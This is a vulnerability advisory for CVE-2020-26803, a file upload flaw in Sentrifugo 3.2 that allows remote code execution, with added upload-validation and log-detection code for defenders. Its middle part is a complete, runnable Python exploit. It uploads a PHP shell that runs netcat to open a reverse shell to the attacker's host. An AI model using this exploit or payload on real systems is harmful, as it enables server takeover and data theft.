Sentrifugo Version 3.2 -> RCE [Authenticated] (assets) | CVE-2020-26803

Software: https://sourceforge.net/projects/sentrifugo/
Version: 3.2
Vulnerability: Unrestricted File Upload
CVE: CVE-2020-26803
Exploit-DB: https://www.exploit-db.com/exploits/48997
Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs. Sentrifugo makes your organization's HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more. Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization's goals. Sentrifugo is the only solution you'll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference: https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In the Sentrifugo web application, users can upload an image under the "Assets -> Add" tab. This "Upload Images" functionality suffers from an "Unrestricted File Upload" vulnerability: the uploaded file's type and extension are not restricted on the server side, so an authenticated attacker can upload malicious files (such as a PHP script) through it and take control of the server.
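The fix for this class of bug is server-side validation that does not trust the client-supplied filename or Content-Type. The following is an added example of such a check, written for this page and not taken from Sentrifugo's code base; every name in it is an assumption. It enforces an image extension allow-list, verifies the file's magic bytes against that extension, and replaces the client's filename with a server-generated one, so a "shell.php" declared as image/jpeg (the exact trick used in this advisory) is rejected before it reaches the web root.

```python
"""Added example (not Sentrifugo's code): a server-side upload check that
would stop the CVE-2020-26803 abuse pattern. All names are assumptions."""
import os
import secrets
from typing import Optional, Tuple

# Only image extensions may be stored under the public uploads directory
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Magic-byte signatures of the allowed image formats (first bytes of the file)
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message says why."""


def sniff_image_ext(data: bytes) -> Optional[str]:
    """Return the canonical extension for the image signature at the start
    of `data`, or None if the bytes are not a recognised image."""
    for signature, ext in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return ext
    return None


def validate_upload(original_name: str, declared_type: str, data: bytes) -> str:
    """Validate an upload and return the server-chosen filename to store it as.

    The client-declared Content-Type is only a hint; the decision is made on
    the extension allow-list and on the actual bytes. Raises UploadRejected."""
    # Use only the basename so path components in the client name are ignored
    ext = os.path.splitext(os.path.basename(original_name))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    if not declared_type.lower().startswith("image/"):
        raise UploadRejected(f"declared Content-Type {declared_type!r} is not an image")
    sniffed = sniff_image_ext(data)
    if sniffed is None:
        raise UploadRejected("file content does not match any allowed image signature")
    if ext == ".jpeg":
        ext = ".jpg"  # normalise so .jpeg and .jpg compare equal
    if sniffed != ext:
        raise UploadRejected(f"extension {ext!r} does not match content {sniffed!r}")
    # The stored name is generated by the server, with the extension taken
    # from the sniffed content, so no client-chosen name ever hits the disk.
    return secrets.token_hex(16) + sniffed


def check_upload(original_name: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Convenience wrapper: (accepted, stored_name_or_reason)."""
    try:
        return True, validate_upload(original_name, declared_type, data)
    except UploadRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed samples: the advisory's payload shape, and a real PNG header
    php_payload = b"<?php system('id'); ?>"
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(check_upload("shell.php", "image/jpeg", php_payload))   # rejected on extension
    print(check_upload("shell.jpg", "image/jpeg", php_payload))   # rejected on content
    print(check_upload("photo.png", "image/png", png_header))     # accepted, random name
```

The order of the checks matters less than the fact that all three run: an extension allow-list alone is bypassed by renaming, a Content-Type check alone is bypassed by the exploit on this page, and a magic-byte check alone still lets a polyglot keep a script extension. Generating the stored name server-side removes the last of those paths.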

I wrote an exploit to demonstrate the vulnerability. You need to change hardcoded values before running the exploit.

Exploit:

```python
import requests
from bs4 import BeautifulSoup
from ast import literal_eval

'''You should change the below hardcoded inputs to get a reverse shell.'''

login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/"
username = "xxxx"
password = "xxxx"

attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"

# Set proxy for debugging purposes
proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}

# Log in to the system
session = requests.Session()
request = session.get(login_url)
body = {"username": username, "password": password}
# session.post(login_url, data=body, proxies=proxy)
session.post(login_url, data=body)  # Send a request without proxy
print("Logged in to the application..")

# Upload the PHP shell
files = [
    ('myfile',
        ('shell.php',
         '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip, listener_port),
         'image/jpeg')
     )
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files)  # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str)  # Convert bytes to dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))

# Trigger the shell
session.get(url)
```
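From the defender's side, the exploit leaves a distinctive trace in the web server access log: a POST to the assets upload endpoint followed by a GET of a script-like file under the public image temp directory, both from the same client. The following is an added example, not part of the advisory, that scans Apache/nginx combined-format log lines for that pattern. The log lines and the stored filename are constructed for the example; the request paths are the ones this advisory names, and the log format is assumed.

```python
"""Added example (not from the advisory): detect the upload-then-fetch
sequence of CVE-2020-26803 in combined-format access logs. Sample lines
below are constructed; the endpoint paths come from the advisory."""
import re
from typing import Dict, List, Optional

# Combined log format: ip ident user [ts] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

UPLOAD_PATH = "/sentrifugo/index.php/assets/assets/uploadsave"
TEMP_DIR = "/sentrifugo/public/uploads/assets_images_temp/"
# Anything the PHP handler might execute; nothing of this kind belongs in an image directory
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(?:$|\?)", re.IGNORECASE)

# Constructed sample: one attacker session (10.0.0.5) and one benign upload (10.0.0.9)
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2020:10:01:02 +0000] "POST /sentrifugo/index.php/index/loginpopupsave HTTP/1.1" 200 512 "-" "python-requests/2.24.0"
10.0.0.5 - - [18/Oct/2020:10:01:03 +0000] "POST /sentrifugo/index.php/assets/assets/uploadsave HTTP/1.1" 200 201 "-" "python-requests/2.24.0"
10.0.0.5 - - [18/Oct/2020:10:01:04 +0000] "GET /sentrifugo/public/uploads/assets_images_temp/1603015263_shell.php HTTP/1.1" 200 0 "-" "python-requests/2.24.0"
10.0.0.9 - - [18/Oct/2020:10:05:10 +0000] "POST /sentrifugo/index.php/assets/assets/uploadsave HTTP/1.1" 200 201 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Oct/2020:10:05:11 +0000] "GET /sentrifugo/public/uploads/assets_images_temp/1603015510_laptop.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its fields, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_script_fetches(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per request for a script-like file in the image temp
    directory. Each finding records whether the same client had already
    POSTed to the upload endpoint earlier in the log (the full exploit chain)."""
    uploaders = set()
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(UPLOAD_PATH):
            uploaders.add(rec["ip"])
        elif rec["path"].startswith(TEMP_DIR) and SCRIPT_EXT.search(rec["path"]):
            findings.append({
                "ip": rec["ip"],
                "timestamp": rec["ts"],
                "path": rec["path"],
                "status": int(rec["status"]),
                "uploaded_first": rec["ip"] in uploaders,
            })
    return findings


if __name__ == "__main__":
    for finding in find_script_fetches(SAMPLE_LOG):
        chain = "full upload->execute chain" if finding["uploaded_first"] else "script fetch only"
        print(f"{finding['ip']} {finding['timestamp']} {finding['path']} ({chain}, HTTP {finding['status']})")
```

A GET for a .php file under the image temp directory is worth an alert on its own, whether or not the upload is visible in the same log, because a web server configured correctly for that directory should never execute anything there; the `uploaded_first` flag only raises the confidence. The same logic is a direct fit for a SIEM rule keyed on request path and method.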
